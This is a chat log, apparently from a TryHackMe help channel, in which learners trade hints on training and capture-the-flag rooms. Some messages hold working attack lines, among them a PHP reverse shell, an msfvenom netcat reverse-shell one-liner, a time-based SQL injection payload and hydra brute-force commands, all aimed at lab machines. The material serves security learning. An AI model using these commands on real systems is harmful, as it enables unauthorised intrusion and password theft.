# cold eagle did you search on google?

||I found that the site is made from a template from projectworlds. However, I can't seem to find exploits with the versions mentioned in the tutorial to make the app||

long falcon
#

Yeah I've looked for every software with version I could find

#

Unless I should be looking for less specific stuff on exploit-db?

cold eagle
#

Forgive for typing mistake

long falcon
#

I think I've tried that exact script, the link is marked as already visited

#

But is that the one? I'll try it again

#

this is what it's giving me when I try it

#

bruh moment, I completely read over that part

#

Thanks ๐Ÿ™ @burnt rivet @cold eagle

green minnowBOT
#

Gave +1 Rep to @burnt rivet

long falcon
#

thanks @cold eagle sorry for second ping but I gotta give you that rep ๐Ÿฆพ

green minnowBOT
#

Gave +1 Rep to @cold eagle

weak epoch
#

Hi can I get a bit of assistance with room Kenobi Task 3. So I created and mounted the directory as it wanted me to and generally followed instructions before that now it wants me to cp and chmod a key named id_rsa and use it but I'm just a little turned around after mounting the directory and how to access the key through it

versed fulcrum
#

Hello, I'm working on Zeek Exercises, Task 3. Its asking what kind of file is associated with the malicious document. I finished the rest of task 3, but this eludes me. is it asking for a file type, or something else? ive tried a couple options that i thought were reasonable but none of the obvious to me answers are correct. Does anyone have any advice?

real yarrow
#

Any hint @solemn smelt

topaz umbra
#

Please post your question and the room etc. in this channel as Metapoit described and be patient ๐Ÿ™‚

real yarrow
#

Room: Blue
Task 5: Find Flags
URL: https://tryhackme.com/room/blue
flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

green minnowBOT
#

Gave +1 Rep to @topaz umbra

topaz umbra
#

add the room name / url and task number. You will get help sooner if you make it easier for people

#

perfect

#

๐Ÿ™‚

real yarrow
#

I already have the highest privilege

topaz umbra
#

I cant open the room atm because I'm working but it sounds like you should just look around a bit if you have done priv esc already

timber knoll
#

What's up with the
What is the name of the project that offers a transform based on ATT&CK?
question?

#

I thought I had it, but apparently I was wrong

lucid junco
#

Which room are you in?

timber knoll
#

Ffs

#

The correct answer is not the name of the project, but the company who makes it

#

Welp, at least I got it

#

lol

misty vessel
#

I don't get it why my answer is wrong tbh

misty vessel
left thunder
misty vessel
left thunder
lucid junco
misty vessel
left thunder
sweet lantern
#

Guys, could you help me with this question (What type of logging will this method prevent?) this is Evading Logging and Monitoring room, task 9. I completed already all room but stack on it
https://tryhackme.com/room/monitoringevasion

buoyant flint
#

Check the text above the questions

teal seal
#

i am stuck on task 10

#

can anyone help me on task 10

topaz umbra
#

Ah Lassi already got you I see ๐Ÿ˜‰

white salmon
#

Hi guys! Iโ€™m in the room evading logging and monitoring task 10
Any of you knows how can I copy and paste the code to the windows sandbox?
I have only 3 task left to finish the Read Teaming Sandbox evasion task 5 , signature Evasion task 7( that code kill my eyes yesterday) ๐Ÿคฃ

modern dome
#

guys please help i cant find anything on the "walking an application" what ever the acme it support webiste im going to has nothing in thr source

left thunder
#

!docs verify

proud scarabBOT
hallow tinsel
hallow tinsel
#

Anyone can help me in Zeek-Exercise room task 3.

topaz umbra
#

what is your question?

hallow tinsel
topaz umbra
#

no dm please

#

I cant enter this room at the moment. Please wait for someone who can who wants to assist you

#

3.3 is which question in thatsscreenshot?

hallow tinsel
#

the first

topaz umbra
#

did you follow the questions instruction ( go to virustotal? )

hallow tinsel
#

I did, I tried.

topaz umbra
#

what does the hint reveal

#

I'm not in the room so I can only give some basic blind suggestions ๐Ÿ˜‰

hallow tinsel
#

thanks

topaz umbra
#

did you get it or?

hallow tinsel
#

not yet

grizzled crane
#

Hi, first time here, and I try to do the room Vulnversity, the Task is want me to find version of squid proxy version and the port server is running on. My problem is after nmap there is no port running for squid and port 3333(which is the port server should running on) and I try to open with the IP on browser, there is error response 405 method not allowed. I try to ask is this room dead?

languid isle
#

!docs verify

proud scarabBOT
languid isle
#

verify to send screenshot

grizzled crane
#

Nmap scan report for ec2-34-249-229-192.eu-west-1.compute.amazonaws.com (34.249.229.192)
Host is up (0.20s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
25/tcp filtered smtp
80/tcp open http WebSockify Python/3.6.9
111/tcp open rpcbind 2-4 (RPC #100000)
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
445/tcp filtered microsoft-ds
3389/tcp open ms-wbt-server xrdp
5901/tcp open vnc VNC (protocol 3.8)
6001/tcp open X11 (access denied)
7777/tcp open cbt?
7778/tcp open interwise?

#

screenshot here

languid isle
grizzled crane
#

I use my own laptop scan the public ip of that attack box

#

the result is same when I use the split view on website

#

I want to give more try but the split view is tooooo slow and I switch

languid isle
#

ohh u need to connect to vpn first to do any of the rooms in THM

#

!vpn

proud scarabBOT
languid isle
#

do this room first

grizzled crane
#

ok let me take look first, any way thank you for help๐Ÿ˜†

fallow sedge
#

In the Into to Scripting room is asks what the data type for the payload should be? I can't find the right answer anywhere... what is it asking for?

lucid junco
#

Which room?

fallow sedge
#

Intro to PoC Scripting

#

@lucid junco ^

lucid junco
#

Oh I haven't done that one.

fallow sedge
#

I have tried all the 'data types' that I thought would make sense but none of them are the answer

#

I suspect this will be either kind of dumb or a "DOH!" moment yup... DOH!

magic patrol
#

How to solve windows local persistent room

#

I followed the instructions but I can't get the third flag. When I rdp it says access denied

#

Rid hijacking

spare ibex
#

Morning All

Anyone do the 'brute force heroes' room lately? I'm stuck on task 5 (bruteforce password with patator) .. I have patator doing the bruteforce & tried a couple of different password lists (including the passwords.txt provided with the room) but haven't had success as of yet

white salmon
#

Can anyone give me a hint for the SQL injection module? Basically I'm at the SLEEP injection step, and here's what I'm trying to do: ||referrer=useeer' UNION SELECT SLEEP(5),2 FROM users WHERE id = '1' AND password = '%';-- - || The request doesn't wait for 5 seconds before being performed so I assume something must be wrong, but what? How is it possible to guess the password if I can't use the || % || character?

dusk imp
#

what room is this one?

white salmon
dusk imp
#

ty

white salmon
#

No problem

dusk imp
#

just waiting for the attackbox to boot

#

I'm pretty sure I can see what's wrong with it but I wanna double check

white salmon
#

This is much appreciated

dusk imp
#

Well, that's what this channel is for ๐Ÿ™‚

#

@white salmon Sorry I went afk for a second, the statement is almost correct, check your column names. ๐Ÿ™‚

#

I had to go make a coffee haha

white salmon
#

It's alright, I hope you have a nice meal, so that's just about the column names?

#

id seems to be fine since the request waits for 5 seconds, so it must be the password one I'm wrong about

#

So I checked my column names and both seem to be right, which is why it's odd, but when I do the following it does wait for five seconds: || AND password != "%" ||

#

So I guess the issue is || % || is being counted as a character of the password

dusk imp
#

Have a look back at the boolean based sqli.

white salmon
#

Oh yeah I understand

#

Sorry for bothering

dusk imp
#

it's no bother at all

#

again, we're here to help.

#

well, it's hints after all, not answers ๐Ÿ˜‰

white salmon
#

Yeah I figured out I had to use || LIKE || instead of || = ||

dusk imp
#

mmhm

lucid junco
#

+rep @dusk imp

green minnowBOT
#

Gave +1 Rep to @dusk imp

white salmon
#

+rep @dusk imp (Didn't know we could do this)

green minnowBOT
#

Gave +1 Rep to @dusk imp

dusk imp
#

two reps

#

@lucid junco how nice. โค๏ธ

#

thanks both of you.

white salmon
#

You're welcome, you were very helpful

white salmon
#

I just got the flag, thank you unreal

slim valley
#

Is it right : crunch 5 5 -t "THM@!" -o tryhackme.txt
If it is why it shows error?

little ingot
#

Im in the "Blaster" room, Task 3. I'm stuck trying to find the correct cve. I've watched the walk through video. No history in the target machine web browser. Tried searchspoit and google (iis 10). could not find the cve they are looking for. any body got a suggestion what to search for next.

young knot
#

hey im in linux fund. stuck in http-server missino. can anyone help?

fervent kayak
#

what's the problem you are encountering?

young knot
#

first of all thanks for answer quickly

#

so im trying to use http server to copy some file. and when i write from another terminal : wget XXX..., its says the file not found

#

so i try to find it by find command, and it says i have no permision

fervent kayak
#

What's the exact command you did? Where is the file located?

#

Sorry, I don't have long also. I have to leave in a few minutes

young knot
#

im not sure where is it

fervent kayak
#

Do you have a link to the room you are working on?

young knot
#

yes

#

task num 4

fervent kayak
#

For this room, there's walkthrough video. Have you checked it out?

#

If ever, have you started the target machine?

#

Are you using your VPN or the attack box?

young knot
#

i did already, i think when they took the video the mission was a little bit diffrent

#

i use attack box

#

and i cant find the .flag.txt file for coping

fervent kayak
#

what's the command you did? Can you provide a screenshot?

young knot
#

yes, can i DM you please?

fervent kayak
#

Sorry, no. I have to go also.

#

If ever, you need to verify so you can post screenshots

#

!docs verify

proud scarabBOT
fervent kayak
#

follow the steps there

young knot
#

ok thanks

vagrant vapor
#

!rep

#

!rep

#

!rank

#

!rank

#

+rep @vagrant vapor

upper mulch
#

any hint ?

#

sandbox evasion last question

#

task 4

spare ibex
lucid junco
#

@rose jewel let's talk in here.

rose jewel
#

and i have checked room write ups my way is correct but the web server have issues with opening certain directorys

lucid junco
#

sudo ip link set dev tun0 mtu 1200

Try that in a seperate terminal.

rose jewel
#

it worked

#

thanks

#

๐Ÿ‘

green minnowBOT
#

Gave +1 Rep to @lucid junco

lunar hatch
#

for the question "Deploy the interactive lab using the "View Site" button and spoof your MAC address to access the site. What is the flag?", when i do this i dont see a flag ๐Ÿ˜… any hints?

cold eagle
lunar hatch
#

its the second task thing

#

last question ๐Ÿ˜…

cold eagle
lunar hatch
#

Ooooh

#

i didnt realize i could edit the address ๐Ÿ˜‚ mb

#

thanks for the help!

stoic wyvern
#

hi

#

Need help out

#

red team room task 6

#

What syntax would you use to create a rule to produce the following: "S[Word]NN where N is Number and S is a symbol of !@?

lucid junco
alpine kestrel
white salmon
#

Hello hackers, I'm in the room Intro to LAN right now and on the section for ARP Protocol > questions, one of them asks; What category of ARP Packet asks a device whether or not it has a specific IP address?

From what I can tell, the answer is "ARP request." No?

#

It says incorrect answer.

#

Ah, thanks!

robust cosmos
#

Anyone have any words of advice on what I'm doing wrong when trying to copy a SSH Private key? I keep getting "error in libcrypto" when trying to login with it. I've made sure there are no extra spaces or characters before or after the begin or end

#

nevermind, just found my issue haha

green marten
#

I have finally been able to login with a username starting with 'a' in the Looking Glass room but cant find anything that points me where to go from here. Any hints available that someone can share?

languid isle
slim valley
#

block logs are located in Microsoft/Windows/PowerShell/Operational or Microsoft-Windows-PowerShell

#

why i cant locate the blocks?

chrome scaffold
spare ibex
green marten
green marten
#

Going thru nearly every link in hacktricks I was finally able to figure it out. Man that was difficult.

languid isle
green marten
#

Ive used the host parameter with sudo before but I didnt think at all to look in to sudoers... I dont think I evert would have thought about that if I didnt see it mentioned on hacktricks

languid isle
green marten
#

That was one of the first things I tried too

#

And then linpeas of course which showed me nothing. I then spent hours just trying to look around the system. Epic fail there too.

languid isle
#

just to know what to do next

green marten
#

Definitely. Im new to thm so Im trying to do these without writeups

languid isle
green marten
#

Not at all

languid isle
#

apparently write up can actually point out new technique to solve

#

always a good idea to read it after if u insist to not use it while doing the box

green marten
#

Thats a great point. I should go thru some writeups and see what other people did

languid isle
#

yea maybe we haven't went through the rabbit hole and the way of getting out of it

green marten
#

Im working on the Mr Robot ctf right now. Need 3rd flag

#

linpeas for the win on that one

languid isle
#

find / -perm /4000 2>/dev/null and look at the unusual one

green marten
#

Good idea. Linpeas is a goto for me so I automatically used it. I like your way for when Im unable to upload anything

#

Thank you @languid isle

green minnowBOT
#

Gave +1 Rep to @languid isle

green marten
#

Im working on the tomghost machine but getting a secret key not available error when decrypting the pgp file. Is this expected?

#

Ive also tried specifying the .asc file and get the same error

#

Ah... documentation says I need to import the key file first. nvm

odd halo
#

hey guys iโ€™m having trouble with the room password attacks in task 8 can i have some help?

#

last 3 flags of task 8 of room passwords attacks

#

yes sorry. @burnt rivet

so for task8 second question i used this command: hydra -l pittman@clinic.thmredteam.com -P wordlist.lst smtp://10.10.58.130:25 -v

where wordlist.lst is a dictionary based file made with john with this rule: Az" [0-9][0-9]" ^[!@]

using this command: john --wordlist=clinic.lst --rules=thm-passoword-attacks --stdout>wordlist.lst

where clinic.lst is a file that i got with this command: cewl https://clinic.thmredteam.com -m 8 -d 5 -w clinic.lst

#

but when i run hydra i keep getting this error [ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 454 4.7.0 Temporary authentication failure: Connection lost to authentication server

coral girder
#

Obfuscation Principles
Task 5

What obfuscation layer aims to confuse an analyst by manipulating the code flow and abstract syntax trees?

Can i get a tip as really struggling with this, have tried everything i think it can be and have tried everything.

proper quail
#

@coral girder its written in plain english on the page.

#

keep trying things. keep in mind it is asking for the name of a whole layer.

coral girder
#

Honestly think ive tried everything on page lol

proper quail
#

@coral girder I promise you haven't because the answer is literally on the page. A layer encompasses more than one principle in this case. Find something that encompasses smaller principles.

coral girder
#

Thank you, its always easy when you know haha thanks fo rthe help.

green marten
#

I am working on the nax room and am stuck trying to get some data from a website in the image I found for question 1. The site BertNase site says my image does not have any data. Can someone help push me in the correct direction on why that might be? Ive downloaded it multiple times...

green marten
#

Got it... nvm

zealous coral
#

Does anyone know what happens with of the webshell of persisting through existing services? In Windows local persistence

glossy cobalt
#

Hello I need help to answer this questions task 4 Active directory basics

#

Actually I just donot know how to log in to another user account

#

I even do not know how to connect via RDP

#

what is that ๐Ÿ˜ฆ

spare ibex
glossy cobalt
glossy cobalt
green minnowBOT
#

Gave +1 Rep to @spare ibex

rain thistle
#

In windowsapi room...and the question is what type of method is used to reference the API call to obtain a struck?

young dagger
#

hi guys can anyone help me out with hydra

#

i want to brute force a login form

#
hydra -t 1 -V -f -l milesdyson -P passwords 10.10.38.225/squirrelmail/src/login.php http-form-post 
#

but its not working folllowing error

#
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[ERROR] the variables argument needs at least the strings ^USER^ or ^PASS^: (null)
young dagger
#

wait where

#

did it with burp suite

#

oh damn thought

#

hydra just takes the username and the specified passwordlist and enters it in the form

young dagger
#

Hi guys

#

sitting on the room skynet and i try to use the php reverse shell

#
<?php
    system('php -r '$sock=fsockopen("10.10.95.57",4444);exec("/bin/sh -i <&5 >&5 2>&5");'')
?>
#

is this valid?

alpine kestrel
#

would think you would need a bigger file then that for a php reverse shell but could be wrong

#

yuup shadow is wrong according to the options from 0day:s revshells.com

stuck fractal
hot tusk
#

hi guys! is still working CTF "hacker vs hacker"?? i found the lachlan ssh key and can't get into it, with the key 'nthisis........'

umbral trout
#

Hi guys, I am new in CyberSec, I am trying doing telnet exploiting in network service room on THM. I am just wondering why trying connect with netcat like ".RUN nc [my machine ip] [port] and my machine is listening on that port, my machine comes up with connected with the target machine msg , but when Im tryin some command there is no output. But I try to .RUN a payload generated by msfvenom reverse_netcat, it works fine. Thank you in advance

proven pier
#

Hello im doing the room vulnversity, and im trying to get a root shell by abusing /bin/systemctl SUID permisions but the hint i need is netcat is giving me this

#

listening on [any] 8080 ...
10.10.65.223: inverse host lookup failed: Unknown host
connect to [10.13.48.58] from (UNKNOWN) [10.10.65.223] 51070
/bin/sh: 0: can't access tty; job control turned off

proven pier
#

Boxes ip mine is 10.13.48.58

quick holly
#

Just change the IP on line 49 and the port on line 50 and you're good to go

umbral trout
#

you mean when my two machines connected by nc successfully, it is not a shell and can not exe cmds and when i use msfvenom to create a reverse_netcat it will give me a shell to execute command. Am I understand right?

umbral trout
#

thanks sir

green minnowBOT
#

Gave +1 Rep to @burnt rivet

serene badger
#

for the mr robot ctf, is there any way of making the process of bruteforcing the password faster cuz its will take like half an hour for hydra to run through the whole list

lucid junco
serene badger
#

||hydra -V -l Elliot -P fsocity.dic 10.10.157.77 http-post-form "/wp-admin.php:log=^USER^&pwd=^PASS^&wp-submit=Log+ In: password you entered"||

#

thats the full command

celest bane
#

So like they are not always the same? Or

celest bane
#

I am looking at the man page I believe I am getting it, just not sure what the other character is

#

Where does it say '!' is a special character ? Or?

#

Damn, I am clearly missing something here. So ! is a special character however, its not in the list of special patterns ๐Ÿค”

#

Yes I don't see "!"

#

Okay, Yes thats why I though this would be Right, crunch 5 5 -t THM@! -o tryhackme.txt.

alpine kestrel
#

ah another person having problem with that part of password attacks

#

good old classic at this point

celest bane
#

crunch 5 5 -t THM%% -o tryhackme.txt

#

crunch 5 5 -t THM^^ -o tryhackme.txt ?

#

Lol, thanks

alpine kestrel
#

YAY you got the answer

celest bane
#

I see the problem is with understanding the question. Since I instantly thought 'THM@!' was the pattern it wanted me to use

alpine kestrel
#

yeah the english for the question might need some simplification.... but dunno about how to get that done

celest bane
#

Perhaps just emphasise it, like saying create a crunch command that will contain THM@! and THM!!

cinder harbor
#

good evening, needing a little nudge for crypto 101

stuck fractal
cinder harbor
#

task 9, trying to import the file into the attack box

#

i tried using google drive but my credentials dont work in the attack box

#

im sorry task 11

stuck fractal
#

Scp works

#

Which file is it?

cinder harbor
#

gpg.zip

umbral trout
#

mkfifo /tmp/orapl; nc [ip][port] 0 < /tmp/orapl | /bin/sh > /tmp/orapl 2>&1; rm /tmp/orapl
This is the payload generated by msfvenom. Im trying to understand how it really works.
My local machine is listening on the port. The thing is what the diff between (nc [ip][port] 0 < /tmp/orapl | /bin/sh > /tmp/orapl 2>&1) and (nc [ip][port] 0 < /tmp/orapl; /bin/sh > /tmp/orapl 2>&1) when i try replace the " | " pipe with colon the target machine and my machine still connect but seem like I can't get the shell from the target machine

stuck fractal
stuck fractal
umbral trout
#

no just replace for the real ip and port

cinder harbor
#

i am a subscriber however the the room im in being done through school so i dont think my creds will work

stuck fractal
umbral trout
#

it works fine just try to replace | with ; to figure how the command works

stuck fractal
#

I'd focus on understanding the command first

umbral trout
cinder harbor
#

@stuck fractal i will work on trying import however i do have another question on task 9

#

i ran 2 differnt ways and i still came up with the same answer of mango

stuck fractal
#

That's blatantly wrong so I'd question your methods

#

!docs verify

proud scarabBOT
stuck fractal
#

Please follow these steps, to allow you to post images.
Once you've done that, please post a screenshot of what you're doing.

cinder harbor
#

@stuck fractal

soft ibex
#

Hi guys I'm just a noob and got stucked in **simple ctf **not able to download the file from ftp server please look into it and suggest me something.

proud scarabBOT
cold eagle
#

Verify yourself and show screenshot of your command

white salmon
#

Hello guys, i'm doing chill machine and when i retrieve the correct password for user "anurodh", i get an "authentication failure" even tho i'ts the correct password (got it from the source_code.php). I've done some research and this isn't happening for people retrieving the same password. Is something there i'm missing? Any help would be nice

cold eagle
white salmon
cold eagle
white salmon
#

no

alpine kestrel
cold eagle
white salmon
#

which give me the password encoded in base64

cold eagle
white salmon
#

i have acces to user apaar

#

i already got user falg

#

need to escalte to root

cold eagle
white salmon
#

it doesn't work

#

i try to put random pass like 12345, which is not the password, and it says "Authentication failure"

#

like with the correct one

cold eagle
#

Make sure it only contains password not blank spaces

white salmon
#

ok that was it, for some reason i was copyig the pass with a blank space at the end, cuz i delete 1 char when ctrl+v and i get to the user, ty man for ur time, appreciate it!

white salmon
#

ye i got to anurodh

soft ibex
#

@cold eagle thanks man, its solved

green minnowBOT
#

Gave +1 Rep to @cold eagle

crystal flax
#

Hello I'm having trouble with subdomainenumeration task 6. I looked and previous students had trouble as well. For the Machine IP portion of the command you're supposed to put the IP of the target machine... but I don't know where to find that

alpine kestrel
crystal flax
crystal flax
#

It's hidden in Task 1 -_-

alpine kestrel
#

yuups and that is kinda common

#

that the start machine button is in the first task for a room

crystal flax
green minnowBOT
#

Gave +1 Rep to @alpine kestrel

alpine kestrel
#

no problem

#

and hope you continue and like your learning journey

jade heath
#

has anyone hot a hint about unified kill chain task 6

#

2nd question

upper mulch
#

Windows Defender Antivirus is configured to exclude a particular extension from scanning. What is the extension?

#

windows hardening task 5

patent beacon
upper mulch
#

yes gotcha thanks !!

#

I was looking at google but found

civic summit
#

guys

serene badger
#

heya need a mental push to make me remember how im supposed to do this

#

im doing the linux priv esc room in jr pentesting

#

and need to copy both /etc/shadow and etc/passwd

#

but how would i go about copying it from target machine to local machine?

#

its for task 7

#

yeah but when i tried it with attackbox/targetbox combo i couldnt seem to copy it

#

now im trying it with a local kali boot and only target so maybe that makes a difference

#

alright

#

still doesnt wanna copy, right click, ctrl+c and ctrl+ins dont work

#

god, im going to blame this on it still being early here

#

XD

#

thanks

serene badger
#

whoops

serene badger
#

cronjobs task

left thunder
# serene badger

Considering your previous screenshot, you are using the wrong IP

serene badger
#

it has a new box for each task lol

left thunder
serene badger
#

or is that the ip of the target box

left thunder
#

And since you want to catch the connection on your attacking machine, you are using the wrong IP

left thunder
serene badger
#

yeah i noticed that, your right, but now i cant find tun0 ip lol

#

how do you figure that one out again?

#

havent needed to do that as most of the time it shows on the upper thingie where the target ip now is